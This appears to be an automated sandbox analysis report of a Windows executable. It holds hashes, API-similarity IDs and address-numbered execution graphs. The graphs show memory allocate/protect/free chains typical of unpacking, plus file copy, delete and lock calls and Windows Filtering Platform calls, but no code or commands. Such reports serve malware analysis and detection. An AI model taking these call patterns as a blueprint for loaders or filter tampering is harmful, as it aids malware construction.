                                                      • API ID: CallTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3163161869-2084237596
                                                      • Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                                      • Instruction ID: a65801eec4a795febb14a72bb9d78bb8f0da6e77f8ac483e65b906d70e3bfe02
                                                      • Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                                      • Instruction Fuzzy Hash: 3371913052CB488FDB68EF1CC4567AAB7E0FB99314F444A9EE58DC3111DB74A582CB82
                                                      APIs
                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 02BA28B0
                                                      • _CreateFrameInfo.LIBVCRUNTIME ref: 02BA28D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2558813199-1018135373
                                                      • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                      • Instruction ID: 9687eae270c8af2f70304e3718173a3415f556e5bc77c427b5400c99a43d0dbe
                                                      • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                      • Instruction Fuzzy Hash: 835165B051CB449FD764EF28C49576A77E2FB89351F1009ADE58AC7621DB30E452CF82

                                                      Execution Graph

                                                      Execution Coverage:59.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:11
                                                      Total number of Limit Nodes:1
                                                      execution_graph 89 2700650 90 2700665 89->90 95 2700620 VirtualAlloc 90->95 92 27006d0 96 27001b0 VirtualAlloc 92->96 95->92 97 270023b VirtualProtect 96->97 99 2700321 VirtualFree 97->99 102 270030c 97->102 100 2700347 VirtualFree VirtualAlloc 99->100 100->102 101 2700531 102->101 103 27004f9 VirtualProtect 102->103 103->102

                                                      Callgraph

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3366011655.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2700000_file.jbxd
                                                      Similarity
                                                      • API ID: Virtual$AllocFreeProtect
                                                      • String ID:
                                                      • API String ID: 267585107-0
                                                      • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                      • Instruction ID: 58042427141154d1acbfac9bc0f169e69cc8c7e061abe2e50d3cfe263cb03176
                                                      • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                      • Instruction Fuzzy Hash: 2FC1C830218A48CFD784EF5CC498B6AB7E1FB98315F51485DF48AC72A1DBB4E885CB06

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 34 2700620-2700644 VirtualAlloc
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3366011655.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2700000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                      • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                                      • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                      • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                                      Execution Graph

                                                      Execution Coverage:6.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:8%
                                                      Total number of Nodes:1691
                                                      Total number of Limit Nodes:8
                                                      execution_graph 10456 7ff66ebac600 10457 7ff66ebac616 10456->10457 10462 7ff66ebac1ae 10457->10462 10459 7ff66ebaca67 10460 7ff66ebab3e7 fputc 10461 7ff66ebac382 10460->10461 10461->10459 10461->10460 10463 7ff66ebac1c0 10462->10463 10480 7ff66ebab2d0 10463->10480 10466 7ff66ebac21f 10469 7ff66ebac290 10466->10469 10472 7ff66ebac235 10466->10472 10467 7ff66ebac20d 10484 7ff66ebab5da 10467->10484 10470 7ff66ebac294 10469->10470 10471 7ff66ebac29b strlen 10469->10471 10508 7ff66ebac08a 10470->10508 10471->10470 10473 7ff66ebac241 strlen 10472->10473 10474 7ff66ebac239 10472->10474 10473->10474 10488 7ff66ebab721 10474->10488 10476 7ff66ebac21a 10476->10461 10478 7ff66ebac274 10478->10476 10479 7ff66ebab3e7 fputc 10478->10479 10479->10478 10481 7ff66ebab2ee 10480->10481 10514 7ff66ebae4e0 10481->10514 10485 7ff66ebab5f0 10484->10485 10486 7ff66ebab4fe fputc 10485->10486 10487 7ff66ebab646 10486->10487 10487->10476 10490 7ff66ebab73d 10488->10490 10489 7ff66ebab78e 10491 7ff66ebab3e7 fputc 10489->10491 10496 7ff66ebab82b 10489->10496 10490->10489 10492 7ff66ebab3e7 fputc 10490->10492 10491->10496 10492->10490 10493 7ff66ebab831 10494 7ff66ebab867 10493->10494 10495 7ff66ebab83a 10493->10495 10498 7ff66ebab3e7 fputc 10494->10498 10500 7ff66ebab8bc 10494->10500 10505 7ff66ebab420 5 API calls 10494->10505 10499 7ff66ebab3e7 fputc 10495->10499 10496->10493 10497 7ff66ebab3e7 fputc 10496->10497 10497->10496 10498->10494 10499->10500 10506 7ff66ebab8d0 10500->10506 10646 7ff66ebab64c 10500->10646 10502 7ff66ebab8e8 10503 7ff66ebab910 10502->10503 10507 7ff66ebab3e7 fputc 10502->10507 10503->10478 10504 7ff66ebab3e7 fputc 10504->10506 10505->10494 10506->10502 10506->10504 10507->10502 10509 7ff66ebac0ac 10508->10509 10510 7ff66ebab721 11 API calls 10509->10510 10511 7ff66ebac0f7 10510->10511 10512 7ff66ebab3e7 fputc 10511->10512 10513 7ff66ebac118 10512->10513 10515 7ff66ebae556 10514->10515 10516 7ff66ebae6b4 10515->10516 10531 7ff66ebab3e1 10515->10531 10578 7ff66ebaf663 10515->10578 10589 7ff66ebae34c 10516->10589 10519 7ff66ebae5ee 10520 7ff66ebae6ac 10519->10520 10522 7ff66ebae6e0 10519->10522 10585 7ff66ebaf717 10520->10585 10592 7ff66ebae320 10522->10592 10524 7ff66ebaee37 10527 7ff66ebaf803 6 API calls 10524->10527 10526 7ff66ebaed9f 10526->10524 10547 7ff66ebaee18 10526->10547 10599 7ff66ebaf949 10526->10599 10530 7ff66ebaee44 10527->10530 10528 7ff66ebaf717 4 API calls 10528->10531 10536 7ff66ebaf949 6 API calls 10530->10536 10541 7ff66ebaee5c 10530->10541 10531->10466 10531->10467 10533 7ff66ebaf717 4 API calls 10544 7ff66ebaf3c7 10533->10544 10534 7ff66ebaf949 6 API calls 10534->10524 10536->10541 10537 7ff66ebaeaae 10537->10528 10540 7ff66ebaf3de 10545 7ff66ebaf717 4 API calls 10540->10545 10542 7ff66ebaeee9 10541->10542 10618 7ff66ebafa57 10541->10618 10549 7ff66ebafa57 6 API calls 10542->10549 10553 7ff66ebaef05 10542->10553 10543 7ff66ebaf717 4 API calls 10543->10547 10544->10537 10544->10540 10548 7ff66ebaf717 4 API calls 10544->10548 10545->10537 10547->10524 10547->10534 10548->10540 10549->10553 10550 7ff66ebaef22 10551 7ff66ebaefdb 10550->10551 10554 7ff66ebaef6e 10550->10554 10552 7ff66ebaefe6 10551->10552 10561 7ff66ebaf2cd 10551->10561 10555 7ff66ebaeff7 10552->10555 10557 7ff66ebafa57 6 API calls 10552->10557 10553->10550 10624 7ff66ebaf763 10553->10624 10559 7ff66ebaf763 6 API calls 10554->10559 10573 7ff66ebaebc1 10554->10573 10560 7ff66ebaf663 6 API calls 10555->10560 10574 7ff66ebaf030 10555->10574 10557->10555 10559->10573 10562 7ff66ebaf00e 10560->10562 10564 7ff66ebaf321 10561->10564 10566 7ff66ebaf763 6 API calls 10561->10566 10565 7ff66ebafa57 6 API calls 10562->10565 10563 7ff66ebaf763 6 API calls 10563->10550 10567 7ff66ebafa57 6 API calls 10564->10567 10564->10573 10565->10574 10566->10561 10567->10573 10569 7ff66ebaf717 4 API calls 10569->10574 10570 7ff66ebaf119 10571 7ff66ebaf1b4 10570->10571 10577 7ff66ebaf134 10570->10577 10572 7ff66ebafa57 6 API calls 10571->10572 10571->10573 10572->10573 10573->10533 10573->10537 10574->10564 10574->10569 10574->10570 10574->10573 10576 7ff66ebaf763 6 API calls 10574->10576 10630 7ff66ebafb9a 10574->10630 10575 7ff66ebaf763 6 API calls 10575->10577 10576->10574 10577->10573 10577->10575 10637 7ff66ebaf560 10578->10637 10581 7ff66ebaf68b 10643 7ff66ebaf605 10581->10643 10582 7ff66ebaf6ec malloc 10582->10581 10583 7ff66ebaf706 10582->10583 10583->10519 10586 7ff66ebaf73b 10585->10586 10587 7ff66ebaf724 10585->10587 10586->10516 10588 7ff66ebaf560 4 API calls 10587->10588 10588->10586 10590 7ff66ebae320 6 API calls 10589->10590 10591 7ff66ebae360 10590->10591 10591->10531 10593 7ff66ebae32c 10592->10593 10594 7ff66ebaf663 6 API calls 10593->10594 10595 7ff66ebae340 10594->10595 10595->10526 10595->10537 10595->10573 10596 7ff66ebaf803 10595->10596 10597 7ff66ebaf663 6 API calls 10596->10597 10598 7ff66ebaf814 10597->10598 10598->10526 10600 7ff66ebaf973 10599->10600 10601 7ff66ebaf95d 10599->10601 10603 7ff66ebaedfd 10600->10603 10604 7ff66ebaf560 4 API calls 10600->10604 10610 7ff66ebaf9d6 10600->10610 10602 7ff66ebaf763 6 API calls 10601->10602 10602->10600 10614 7ff66ebaf829 10603->10614 10605 7ff66ebaf99e 10604->10605 10606 7ff66ebaf9b4 10605->10606 10607 7ff66ebaf803 6 API calls 10605->10607 10606->10603 10609 7ff66ebaf605 LeaveCriticalSection 10606->10609 10607->10606 10608 7ff66ebaf560 4 API calls 10608->10610 10609->10610 10610->10603 10610->10608 10611 7ff66ebaf717 4 API calls 10610->10611 10612 7ff66ebaf829 6 API calls 10610->10612 10613 7ff66ebaf605 LeaveCriticalSection 10610->10613 10611->10610 10612->10610 10613->10610 10615 7ff66ebaf847 10614->10615 10616 7ff66ebaf663 6 API calls 10615->10616 10617 7ff66ebaee0b 10616->10617 10617->10543 10619 7ff66ebafa80 10618->10619 10620 7ff66ebaf663 6 API calls 10619->10620 10622 7ff66ebafa90 10620->10622 10621 7ff66ebafb42 10621->10542 10622->10621 10622->10622 10623 7ff66ebaf717 4 API calls 10622->10623 10623->10621 10626 7ff66ebaf77e 10624->10626 10625 7ff66ebaef43 10625->10550 10625->10563 10626->10625 10627 7ff66ebaf663 6 API calls 10626->10627 10628 7ff66ebaf7b5 10627->10628 10628->10625 10629 7ff66ebaf717 4 API calls 10628->10629 10629->10625 10631 7ff66ebafbaf 10630->10631 10632 7ff66ebafbb3 10631->10632 10634 7ff66ebafbd0 10631->10634 10633 7ff66ebaf663 6 API calls 10632->10633 10636 7ff66ebafbba 10633->10636 10635 7ff66ebaf663 6 API calls 10634->10635 10635->10636 10636->10574 10638 7ff66ebaf573 EnterCriticalSection 10637->10638 10640 7ff66ebaf591 10637->10640 10638->10640 10639 7ff66ebaf5a4 InitializeCriticalSection InitializeCriticalSection 10639->10640 10640->10638 10640->10639 10641 7ff66ebaf5ec Sleep 10640->10641 10642 7ff66ebaf5fe 10640->10642 10641->10640 10642->10581 10642->10582 10644 7ff66ebaf60e LeaveCriticalSection 10643->10644 10645 7ff66ebaf625 10643->10645 10644->10645 10645->10583 10647 7ff66ebab68f 10646->10647 10648 7ff66ebab666 10646->10648 10649 7ff66ebab706 10647->10649 10650 7ff66ebab6a7 10647->10650 10652 7ff66ebb026c 6 API calls 10648->10652 10651 7ff66ebab3e7 fputc 10649->10651 10653 7ff66ebb0047 4 API calls 10650->10653 10659 7ff66ebab6f2 10651->10659 10652->10647 10654 7ff66ebab6d5 10653->10654 10655 7ff66ebab6f4 10654->10655 10656 7ff66ebab6dc 10654->10656 10657 7ff66ebab3e7 fputc 10655->10657 10658 7ff66ebab3e7 fputc 10656->10658 10656->10659 10657->10659 10658->10656 10659->10506 9461 7ff66eba1001 9462 7ff66eba103c __set_app_type 9461->9462 9464 7ff66eba10a9 9462->9464 9911 7ff66ebadcf8 9912 7ff66ebadd06 9911->9912 9913 7ff66ebadd4f 9912->9913 9914 7ff66ebadd3f 9912->9914 9930 7ff66ebad1bd 9913->9930 9922 7ff66ebad3c1 9914->9922 9917 7ff66ebae2e0 9918 7ff66ebae301 9917->9918 9919 7ff66ebaccd9 2 API calls 9917->9919 9919->9918 9920 7ff66ebaccd9 fputwc fwprintf 9921 7ff66ebadb86 9920->9921 9921->9917 9921->9920 9925 7ff66ebad3f3 9922->9925 9923 7ff66ebad513 9924 7ff66ebad593 9923->9924 9926 7ff66ebaca90 fputwc 9923->9926 9927 7ff66ebad5af 9924->9927 9928 7ff66ebaca90 fputwc 9924->9928 9925->9923 9929 7ff66ebaca90 fputwc 9925->9929 9926->9923 9927->9921 9928->9924 9929->9925 9936 7ff66ebad20f 9930->9936 9931 7ff66ebad373 9932 7ff66ebad38c 9931->9932 9934 7ff66ebaca90 fputwc 9931->9934 9935 7ff66ebad3b3 9932->9935 9937 7ff66ebaca90 fputwc 9932->9937 9933 7ff66ebaca90 fputwc 9933->9936 9934->9931 9935->9921 9936->9931 9936->9933 9937->9932 10667 7ff66ebaddf7 10668 7ff66ebade0d 10667->10668 10675 7ff66ebad93d 10668->10675 10670 7ff66ebae2e0 10671 7ff66ebae301 10670->10671 10672 7ff66ebaccd9 2 API calls 10670->10672 10672->10671 10673 7ff66ebadb86 10673->10670 10674 7ff66ebaccd9 fputwc fwprintf 10673->10674 10674->10673 10676 7ff66ebad94e 10675->10676 10684 7ff66ebad00f 10676->10684 10679 7ff66ebad9a0 10692 7ff66ebad897 10679->10692 10680 7ff66ebad993 10688 7ff66ebacc00 10680->10688 10683 7ff66ebad99e 10683->10673 10685 7ff66ebad02d 10684->10685 10686 7ff66ebae4e0 6 API calls 10685->10686 10687 7ff66ebad120 10686->10687 10687->10679 10687->10680 10689 7ff66ebacc16 10688->10689 10690 7ff66ebacacd 10 API calls 10689->10690 10691 7ff66ebacc6c 10690->10691 10691->10683 10693 7ff66ebad8b9 10692->10693 10698 7ff66ebacdd0 10693->10698 10696 7ff66ebaca90 fputwc 10697 7ff66ebad925 10696->10697 10701 7ff66ebacdec 10698->10701 10699 7ff66ebace3d 10700 7ff66ebaca90 fputwc 10699->10700 10706 7ff66ebaceda 10699->10706 10700->10706 10701->10699 10703 7ff66ebaca90 fputwc 10701->10703 10702 7ff66ebacee0 10704 7ff66ebacf16 10702->10704 10705 7ff66ebacee9 10702->10705 10703->10701 10707 7ff66ebaca90 fputwc 10704->10707 10710 7ff66ebacf6b 10704->10710 10715 7ff66ebaccd9 2 API calls 10704->10715 10708 7ff66ebaca90 fputwc 10705->10708 10706->10702 10709 7ff66ebaca90 fputwc 10706->10709 10707->10704 10708->10710 10709->10706 10716 7ff66ebacf7f 10710->10716 10718 7ff66ebacc72 10710->10718 10712 7ff66ebacf97 10713 7ff66ebacfbf 10712->10713 10717 7ff66ebaca90 fputwc 10712->10717 10713->10696 10714 7ff66ebaca90 fputwc 10714->10716 10715->10704 10716->10712 10716->10714 10717->10712 10719 7ff66ebacc80 localeconv 10718->10719 10720 7ff66ebaccae 10718->10720 10721 7ff66ebb026c 6 API calls 10719->10721 10721->10720 9938 7ff66eba58fa 9943 7ff66eba5189 9938->9943 9941 7ff66eba590f 9944 7ff66eba5219 CopyFileA 9943->9944 9947 7ff66eba51b1 9943->9947 9945 7ff66eba5242 GetLastError 9944->9945 9944->9947 9946 7ff66eba14e2 6 API calls 9945->9946 9952 7ff66eba526c 9946->9952 9949 7ff66eba51e8 9947->9949 9947->9952 9948 7ff66eba14e2 6 API calls 9950 7ff66eba53ba 9948->9950 9951 7ff66eba14e2 6 API calls 9949->9951 9950->9950 9953 7ff66eba5209 9951->9953 9952->9948 9953->9941 9954 7ff66eba4bbd 9953->9954 9955 7ff66eba4bd4 DeleteFileA 9954->9955 9963 7ff66eba4bde 9954->9963 9956 7ff66eba4c2b GetLastError 9955->9956 9955->9963 9957 7ff66eba14e2 6 API calls 9956->9957 9957->9963 9958 7ff66eba4d5a 9960 7ff66eba14e2 6 API calls 9958->9960 9959 7ff66eba4c0a 9961 7ff66eba14e2 6 API calls 9959->9961 9962 7ff66eba4d7c 9960->9962 9964 7ff66eba4c20 9961->9964 9962->9962 9963->9958 9963->9959 9964->9941 8871 7ff66eba12fd 8874 7ff66eba1131 8871->8874 8875 7ff66eba115a 8874->8875 8876 7ff66eba1172 8875->8876 8877 7ff66eba1169 Sleep 8875->8877 8878 7ff66eba1194 8876->8878 8879 7ff66eba1188 _amsg_exit 8876->8879 8877->8875 8880 7ff66eba11b5 8878->8880 8881 7ff66eba119a _initterm 8878->8881 8879->8880 8882 7ff66eba11de 8880->8882 8883 7ff66eba11c5 _initterm 8880->8883 8881->8880 8895 7ff66ebaa96b 8882->8895 8883->8882 8886 7ff66eba122e 8887 7ff66eba1233 malloc 8886->8887 8888 7ff66eba1253 8887->8888 8889 7ff66eba1258 strlen malloc 8888->8889 8890 7ff66eba1283 8888->8890 8889->8888 8906 7ff66eba14b8 8890->8906 8892 7ff66eba12c4 8893 7ff66eba12e3 _cexit 8892->8893 8894 7ff66eba12e8 8892->8894 8893->8894 8896 7ff66eba1208 SetUnhandledExceptionFilter 8895->8896 8897 7ff66ebaa989 8895->8897 8896->8886 8898 7ff66ebaab8f 8897->8898 8899 7ff66ebaaa00 8897->8899 8903 7ff66ebaaa3f 8897->8903 8898->8896 8900 7ff66ebaabb7 VirtualProtect 8898->8900 8899->8898 8901 7ff66ebaaa1e 8899->8901 8900->8898 8901->8899 8910 7ff66ebaa824 8901->8910 8903->8898 8904 7ff66ebaaaaa 8903->8904 8905 7ff66ebaa824 3 API calls 8904->8905 8905->8903 8907 7ff66eba14c8 8906->8907 8917 7ff66eba1486 8907->8917 8912 7ff66ebaa84a 8910->8912 8911 7ff66ebaa953 8911->8901 8912->8911 8913 7ff66ebaa8af VirtualQuery 8912->8913 8914 7ff66ebaa8d8 8913->8914 8914->8911 8915 7ff66ebaa907 VirtualProtect 8914->8915 8915->8911 8916 7ff66ebaa93f GetLastError 8915->8916 8916->8911 8924 7ff66eba1360 8917->8924 8920 7ff66eba1496 8943 7ff66eba1432 8920->8943 8974 7ff66eba19c0 GetModuleHandleExA 8924->8974 8929 7ff66eba1393 8989 7ff66eba168c InitializeCriticalSectionAndSpinCount 8929->8989 8933 7ff66eba19c0 8 API calls 8934 7ff66eba13cb 8933->8934 8935 7ff66eba6c99 12 API calls 8934->8935 8936 7ff66eba13e7 8935->8936 9036 7ff66eba6497 8936->9036 8939 7ff66eba13f6 8942 7ff66eba13a1 8939->8942 9042 7ff66eba97f2 8939->9042 8942->8920 8951 7ff66eba9621 8942->8951 9195 7ff66eba193c 8943->9195 8946 7ff66eba1452 8949 7ff66eba145e GetProcessHeap HeapFree 8946->8949 8950 7ff66eba1475 8946->8950 8947 7ff66eba1446 9202 7ff66eba6263 8947->9202 8949->8950 8950->8892 8952 7ff66eba9650 8951->8952 8953 7ff66eba96b0 8952->8953 8954 7ff66eba9656 8952->8954 8955 7ff66eba14e2 6 API calls 8953->8955 9216 7ff66eba76d0 8954->9216 8957 7ff66eba96c6 8955->8957 8957->8920 8959 7ff66eba76d0 8 API calls 8960 7ff66eba966e 8959->8960 8961 7ff66eba9d2d 7 API calls 8960->8961 8963 7ff66eba9672 8960->8963 8964 7ff66eba96ef 8961->8964 8962 7ff66eba96fc FwpmEngineClose0 8962->8957 8963->8962 9230 7ff66eba9d2d 8963->9230 8964->8962 8966 7ff66eba9722 8964->8966 9240 7ff66eba855d 8964->9240 8966->8962 8968 7ff66eba9d2d 7 API calls 8966->8968 8970 7ff66eba9737 8968->8970 8969 7ff66eba96ac 8969->8962 8970->8962 8970->8963 9266 7ff66eba8cfc 8970->9266 8975 7ff66eba19f2 GetLastError 8974->8975 8976 7ff66eba1376 8974->8976 9090 7ff66eba14e2 8975->9090 8978 7ff66eba6c99 8976->8978 8979 7ff66eba6cdf 8978->8979 8980 7ff66eba6caf 8978->8980 8982 7ff66eba14e2 6 API calls 8979->8982 9111 7ff66eba6b9b 8980->9111 8988 7ff66eba138f 8982->8988 8984 7ff66eba6d0f strlen 8985 7ff66eba6d21 8984->8985 8986 7ff66eba6d37 strcat strlen 8984->8986 8985->8986 8987 7ff66eba6d26 strlen 8985->8987 8986->8988 8987->8986 8988->8929 9013 7ff66eba5e6f 8988->9013 8990 7ff66eba17e0 GetLastError 8989->8990 8991 7ff66eba16ba 8989->8991 8992 7ff66eba14e2 6 API calls 8990->8992 8993 7ff66eba19c0 8 API calls 8991->8993 9010 7ff66eba17b9 8992->9010 8994 7ff66eba16d6 8993->8994 8995 7ff66eba6b9b 8 API calls 8994->8995 8996 7ff66eba16ea 8995->8996 8997 7ff66eba16f4 strlen 8996->8997 8996->9010 8998 7ff66eba1723 8997->8998 8999 7ff66eba170d 8997->8999 9002 7ff66eba1748 strlen fopen 8998->9002 9003 7ff66eba1728 strcat strlen 8998->9003 8999->8998 9001 7ff66eba1712 strlen 8999->9001 9000 7ff66eba14e2 6 API calls 9004 7ff66eba139d 9000->9004 9001->8998 9005 7ff66eba1797 9002->9005 9006 7ff66eba18ad 9002->9006 9003->9002 9004->8933 9004->8942 9007 7ff66eba14e2 6 API calls 9005->9007 9008 7ff66eba14e2 6 API calls 9006->9008 9009 7ff66eba17b1 9007->9009 9008->9010 9009->9010 9011 7ff66eba191d 9009->9011 9010->9000 9012 7ff66eba14e2 6 API calls 9011->9012 9012->9004 9014 7ff66eba5f72 9013->9014 9015 7ff66eba5e86 9013->9015 9018 7ff66eba14e2 6 API calls 9014->9018 9016 7ff66eba5e8f CreateFileA 9015->9016 9017 7ff66eba5fa2 9015->9017 9019 7ff66eba5fd5 GetLastError 9016->9019 9020 7ff66eba5eda LockFileEx 9016->9020 9022 7ff66eba14e2 6 API calls 9017->9022 9021 7ff66eba5f27 9018->9021 9023 7ff66eba14e2 6 API calls 9019->9023 9024 7ff66eba5f0e 9020->9024 9025 7ff66eba60ba GetLastError 9020->9025 9028 7ff66eba6239 9021->9028 9029 7ff66eba5f51 9021->9029 9022->9021 9033 7ff66eba5ff6 9023->9033 9024->9021 9026 7ff66eba622b CloseHandle 9024->9026 9027 7ff66eba14e2 6 API calls 9025->9027 9026->9028 9034 7ff66eba60db 9027->9034 9031 7ff66eba14e2 6 API calls 9028->9031 9030 7ff66eba14e2 6 API calls 9029->9030 9032 7ff66eba5f67 9030->9032 9031->9032 9032->8929 9033->9025 9035 7ff66eba6163 9033->9035 9034->9035 9035->9026 9037 7ff66eba64a0 GetFileAttributesA 9036->9037 9038 7ff66eba64b5 9036->9038 9039 7ff66eba64e5 GetLastError 9037->9039 9041 7ff66eba13ef 9037->9041 9040 7ff66eba14e2 6 API calls 9038->9040 9039->9041 9040->9041 9041->8939 9064 7ff66eba433b 9041->9064 9043 7ff66eba98a5 9042->9043 9044 7ff66eba981a 9042->9044 9045 7ff66eba14e2 6 API calls 9043->9045 9139 7ff66eba45d5 9044->9139 9059 7ff66eba9833 9045->9059 9047 7ff66eba9854 9049 7ff66eba9b92 9047->9049 9054 7ff66eba987c 9047->9054 9048 7ff66eba983d GetProcessHeap HeapFree 9048->9047 9050 7ff66eba14e2 6 API calls 9049->9050 9053 7ff66eba9bb4 9050->9053 9051 7ff66eba995d GetProcessHeap HeapAlloc 9052 7ff66eba99d0 9051->9052 9061 7ff66eba999a 9051->9061 9057 7ff66eba14e2 6 API calls 9052->9057 9063 7ff66eba14e2 6 API calls 9053->9063 9055 7ff66eba14e2 6 API calls 9054->9055 9058 7ff66eba9892 9055->9058 9057->9061 9058->8942 9059->9047 9059->9048 9060 7ff66eba9ab3 strncpy strncpy 9060->9061 9061->9059 9061->9060 9062 7ff66eba9b28 strncpy 9061->9062 9062->9061 9063->9053 9065 7ff66eba43e5 9064->9065 9066 7ff66eba435a 9064->9066 9069 7ff66eba14e2 6 API calls 9065->9069 9067 7ff66eba4363 fopen 9066->9067 9068 7ff66eba4415 9066->9068 9070 7ff66eba4374 9067->9070 9071 7ff66eba4448 _errno 9067->9071 9073 7ff66eba14e2 6 API calls 9068->9073 9072 7ff66eba4388 9069->9072 9070->9072 9074 7ff66eba44d6 fwrite 9070->9074 9075 7ff66eba14e2 6 API calls 9071->9075 9081 7ff66eba459a 9072->9081 9082 7ff66eba43bb 9072->9082 9073->9072 9077 7ff66eba44ee 9074->9077 9078 7ff66eba44f8 _errno 9074->9078 9076 7ff66eba4470 _errno 9075->9076 9079 7ff66eba4479 9076->9079 9080 7ff66eba44bd _errno 9076->9080 9077->9078 9083 7ff66eba14e2 6 API calls 9078->9083 9079->9080 9080->9074 9084 7ff66eba14e2 6 API calls 9081->9084 9085 7ff66eba14e2 6 API calls 9082->9085 9086 7ff66eba4520 _errno 9083->9086 9087 7ff66eba43d8 9084->9087 9085->9087 9088 7ff66eba4529 9086->9088 9089 7ff66eba456d _errno 9086->9089 9087->8939 9088->9089 9089->9081 9091 7ff66eba14f0 9090->9091 9101 7ff66ebab210 9091->9101 9094 7ff66eba1577 fwrite fflush 9097 7ff66eba15a0 9094->9097 9095 7ff66eba15ac EnterCriticalSection 9096 7ff66eba15c6 LeaveCriticalSection 9095->9096 9098 7ff66eba15e3 9095->9098 9096->9094 9097->8976 9099 7ff66eba161d CopyFileA 9098->9099 9100 7ff66eba1655 9099->9100 9100->9096 9102 7ff66ebab21e 9101->9102 9103 7ff66ebab235 9101->9103 9107 7ff66ebac2d0 9102->9107 9105 7ff66ebac2d0 fputc 9103->9105 9106 7ff66eba1549 9105->9106 9106->9094 9106->9095 9106->9097 9108 7ff66ebac307 9107->9108 9109 7ff66ebaca67 9108->9109 9110 7ff66ebab3e7 fputc 9108->9110 9109->9106 9110->9108 9112 7ff66eba6be2 9111->9112 9113 7ff66eba6bac 9111->9113 9114 7ff66eba14e2 6 API calls 9112->9114 9115 7ff66eba6bb1 9113->9115 9116 7ff66eba6c12 9113->9116 9122 7ff66eba6bc7 9114->9122 9118 7ff66eba6c42 9115->9118 9119 7ff66eba6bba 9115->9119 9117 7ff66eba14e2 6 API calls 9116->9117 9117->9122 9120 7ff66eba14e2 6 API calls 9118->9120 9124 7ff66eba6a5c 9119->9124 9120->9122 9122->8984 9122->8988 9125 7ff66eba6b05 9124->9125 9126 7ff66eba6a76 9124->9126 9127 7ff66eba14e2 6 API calls 9125->9127 9128 7ff66eba6a7f 9126->9128 9129 7ff66eba6b35 9126->9129 9137 7ff66eba6ac1 9127->9137 9130 7ff66eba6b68 9128->9130 9131 7ff66eba6a88 GetModuleFileNameA GetLastError 9128->9131 9132 7ff66eba14e2 6 API calls 9129->9132 9134 7ff66eba14e2 6 API calls 9130->9134 9133 7ff66eba6aa2 9131->9133 9132->9137 9135 7ff66eba6afa 9133->9135 9136 7ff66eba14e2 6 API calls 9133->9136 9134->9137 9135->9122 9136->9137 9138 7ff66eba14e2 6 API calls 9137->9138 9138->9135 9140 7ff66eba4675 9139->9140 9141 7ff66eba45f7 9139->9141 9142 7ff66eba14e2 6 API calls 9140->9142 9143 7ff66eba4600 9141->9143 9144 7ff66eba46ba 9141->9144 9155 7ff66eba46b0 9142->9155 9146 7ff66eba4610 fopen 9143->9146 9147 7ff66eba46ed 9143->9147 9145 7ff66eba14e2 6 API calls 9144->9145 9145->9155 9148 7ff66eba4720 _errno 9146->9148 9149 7ff66eba462b fseek 9146->9149 9150 7ff66eba14e2 6 API calls 9147->9150 9151 7ff66eba14e2 6 API calls 9148->9151 9152 7ff66eba47f3 9149->9152 9153 7ff66eba4646 _errno 9149->9153 9150->9155 9154 7ff66eba4742 _errno 9151->9154 9164 7ff66eba4802 9152->9164 9165 7ff66eba482b _errno 9152->9165 9156 7ff66eba14e2 6 API calls 9153->9156 9159 7ff66eba478f _errno 9154->9159 9160 7ff66eba474b 9154->9160 9157 7ff66eba14e2 6 API calls 9155->9157 9158 7ff66eba4668 _errno 9156->9158 9161 7ff66eba4b78 9157->9161 9158->9140 9162 7ff66eba47da _errno 9158->9162 9163 7ff66eba481e 9159->9163 9160->9159 9161->9051 9161->9059 9162->9163 9166 7ff66eba4b35 9163->9166 9167 7ff66eba4b2d fclose 9163->9167 9164->9163 9169 7ff66eba48b3 fseek 9164->9169 9168 7ff66eba14e2 6 API calls 9165->9168 9166->9155 9170 7ff66eba4ba2 9166->9170 9167->9166 9171 7ff66eba484d _errno 9168->9171 9172 7ff66eba4941 _errno 9169->9172 9173 7ff66eba48cd 9169->9173 9174 7ff66eba14e2 6 API calls 9170->9174 9175 7ff66eba4856 9171->9175 9176 7ff66eba489a _errno 9171->9176 9178 7ff66eba14e2 6 API calls 9172->9178 9177 7ff66eba49c9 GetProcessHeap HeapAlloc 9173->9177 9193 7ff66eba48df 9173->9193 9174->9161 9175->9176 9176->9163 9179 7ff66eba49f1 9177->9179 